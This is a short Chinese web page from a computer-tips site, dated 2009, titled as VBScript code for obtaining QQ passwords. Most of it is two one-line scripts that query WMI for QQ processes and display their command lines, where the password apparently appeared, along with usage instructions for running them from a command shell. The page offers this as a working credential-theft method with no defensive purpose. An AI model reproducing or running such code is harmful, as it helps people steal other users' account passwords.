首页 电脑 电脑学堂 查看内容

VBS获得QQ密码代码

2009-5-1 07:36 864 0

摘要: 代码: for each i in getobject ("winmgmts:\. ootcimv2").execquery("select * from win32_process wh...
关键词: commandlinenext getobject execquery winmgmts process 代码 select where like root

代码: for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%Qq%'")inputbox "","",i.commandlinenext cmdshell下得到QQ密码代码: for each i in getobject ("winmgmts:\\.\root\cimv2").execquery("select * from win32_process where name like '%Qq%'")Wscript.echo "","",i.commandlinenext 用法:cscript.exe *.vbs(上面的不用,直接运行) 09版的不支持
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部